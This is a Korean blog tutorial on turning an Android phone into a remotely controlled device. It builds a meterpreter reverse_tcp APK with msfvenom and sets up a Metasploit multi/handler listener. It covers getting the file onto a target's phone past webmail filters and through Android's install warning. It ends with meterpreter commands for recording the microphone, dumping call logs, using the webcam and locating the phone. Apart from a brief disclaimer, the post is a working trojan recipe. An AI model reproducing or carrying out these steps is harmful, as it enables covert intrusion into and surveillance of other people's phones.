Android 스마트폰은 종종 대부분의 상업용 IoT 기기의 관문입니다. Nest Smoke 알람은 관련 Android 앱을 통해 관리됩니다. 온도를 제어하는 Nest Thermostat도 마찬가지입니다. 스마트 잠금 장치, 초인종 캠 – 거의 모든 스마트 장치는 Alexa 또는 기타 마스터 앱에서 액세스할 수 있습니다. 누군가가 그러한 Android 전화에 원격 액세스 권한을 얻는다면 어떻게 될까요? 이것이 불가능하다고 생각하십니까? 이를 위해 Kali Linux "metasploit"을 사용하여 Android 휴대폰에 대한 백도어 항목을 만드는 방법에 대한 기본 데모를 제공합니다.
참고 :이 튜토리얼은 보안 연구원 및 취미 활동가를 위한 것입니다. 누군가의 허락 없이 누군가의 전화를 해킹하는 것은 권장하지 않습니다.
배경
Kali Linux 작업을 시작하기 전에 먼저 콘솔 터미널에 익숙해져야 합니다.
장치의 펌웨어 또는 운영 체제를 대상으로 하도록 설계된 포괄적인 도구 목록을 쉽게 호스팅합니다.
여기에서는 "MSFVenom"이라는 일반적인 도구 중 하나를 사용하여 Android 휴대폰에 바이러스를 삽입합니다. 사용자가 선택한 옵션에 따라 여러 종류의 페이로드를 생성합니다. 이 익스플로잇은 Windows, Android, OpenBSD, Solaris, JAVA, PHP 및 게임 하드웨어를 포함한 많은 플랫폼에서 작동합니다.
Android Metasploit 시작
다음 단계는 Kali Linux 시스템에서 MSFVenom을 다운로드하는 방법을 보여줍니다.
터미널을 시작하고 다음 명령어를 입력합니다.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
여기에서 페이로드는 "Meterpreter"라는 Exploit 확장을 사용하여 시작됩니다.
리스너 호스트의 IP 주소를 확인하려면 새 콘솔 터미널을 열고 ifconfig
를 입력합니다. . 일반적으로 포트 4444는 트로이 목마, 익스플로잇 및 바이러스에 할당됩니다.
IP 주소가 결정되면 이전 화면으로 돌아가 세부 정보를 입력합니다.
"hackand.apk" 파일은 바탕 화면에 저장되며 Android 폰에서 사용되는 주요 백도어 익스플로잇입니다.
다음 단계에서는 Kali Linux에서 사용되는 일반적인 침투 테스트 도구인 "msfconsole"을 실행합니다. 이를 위해 service postgresql start
를 입력합니다. 뒤에 msfconsole
. PostgreSQL은 콘솔이 저장된 데이터베이스를 나타냅니다.
침투 도구가 준비되면 나머지 익스플로잇을 실행할 수 있습니다.
다음으로 "multi-handler"라는 실행 파일이 사용됩니다.
use multi/handler
콘솔과 익스플로잇을 연결하는 방법은 아래 이미지를 참고하세요. 동일한 IP 주소와 포트 번호가 사용됩니다.
다음 단계에서는 msfvenom 익스플로잇이 시작되고 간단한 exploit
로 초기화됩니다. 명령. 이제 Android 전화가 될 대상을 찾아야 합니다.
안드로이드 폰과 칼리 리눅스 터미널 연결하기
앞서 다운로드한 hackand.apk 파일의 크기는 10KB에 불과합니다. 대상의 전화에 파일을 삽입하는 방법을 찾아야 합니다. USB 또는 임시 이메일 서비스를 사용하여 바이러스를 전송할 수 있습니다.
일반적으로 Gmail이나 Yahoo와 같은 웹 메일 제공업체는 이 바이러스에 감염된 파일의 전송을 거부합니다.
Android는 소프트웨어를 삽입하기 전에 경고합니다. 그러나 "위험을 무시하고 설치"하기만 하면 되므로 설치를 완료하는 데 20초도 채 걸리지 않습니다. 휴대 전화가 잠금 해제 모드에 있는 경우 위협이 다소 심각해집니다.
여기에 표시된 것처럼 저장 내용 수정, 전화기 절전 모드 방지, Wi-Fi 연결 및 연결 해제, 배경 화면 설정 등을 포함하여 전화기에 많은 손상이 발생할 수 있습니다.
APK 파일이 설치되면 휴대폰 내에서 교묘하게 위장할 수 있습니다.
이제 Kali Linux 터미널에서 다음과 같은 많은 명령을 사용하여 전화를 제어할 수 있습니다. 목록은 간단한 help
에서 사용할 수 있으므로 실제로 기억할 필요가 없습니다. meterpreter
의 옵션 .
record_mic
:마이크 녹음dump calllog
:통화 기록 가져오기webcam_chat
:영상 채팅 시작geolocate
:휴대전화의 현재 위치 가져오기
대부분의 고급 Android 휴대폰은 이 악성 앱이 설치되는 것을 방지합니다. 따라서 이 익스플로잇은 일반적으로 이전 Android 모델에서 작동합니다.
생각
이 튜토리얼에서는 Kali Linux를 사용하여 Android 스마트폰에 액세스하는 기본 전략을 보았습니다. 이것은 매우 간단한 익스플로잇이지만 IoT 보안 측면에서 큰 의미를 갖습니다.
Kali Linux 익스플로잇에 대해 어떻게 생각하십니까? 휴대전화 보안에 더 주의하시겠습니까? 의견에 알려주십시오.